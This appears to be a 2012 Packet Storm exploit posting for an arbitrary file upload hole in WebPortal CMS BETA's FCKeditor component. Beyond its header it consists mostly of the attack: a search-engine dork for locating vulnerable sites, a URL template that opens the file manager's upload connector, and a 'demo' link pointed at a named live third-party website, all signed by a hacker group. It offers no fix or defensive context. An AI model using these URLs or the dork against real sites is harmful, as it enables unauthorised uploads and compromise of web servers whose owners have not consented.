WebPortal CMS Beta Arbitrary File Upload

2012-03-29T00:00:00
ID PACKETSTORM:111275
Type packetstorm
Reporter HELLBOY
Modified 2012-03-29T00:00:00

Description

                                        
                                            ` In The Name Of GOD  
  
==============================================================================  
  
WebPortal CMS BETA (fckeditor) Arbitrary File Upload Vulnerability  
  
==============================================================================  
  
[»] Title : [ WebPortal CMS BETA (fckeditor) Arbitrary File Upload Vulnerability ]  
  
[»] TestedON: [ LINUX ]  
  
[»] Author : [ HELLBOY }  
  
[»] Email : [ A68_HELLBOY@YAHOO.COM ]  
  
[»] Date : [ 2012-4-8 ]  
  
[»] Dork : [ intext:"WebPortal Database Administration." ]  
  
###########################################################################  
  
===[ Exploit ]===  
  
[»] http://Target/[patch]/wp/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector="Namd Of Site"%2Fwp%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php  
  
===[ Demo ]===  
  
[»] http://www.calit2.net/wp/FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http%3A%2F%2Fwww.calit2.net%2Fwp%2FFCKeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php  
  
===[ We Are : ./Iranian HackerZ ]===   
  
Thanks To : MR.XPR  
  
###########################################################################  
`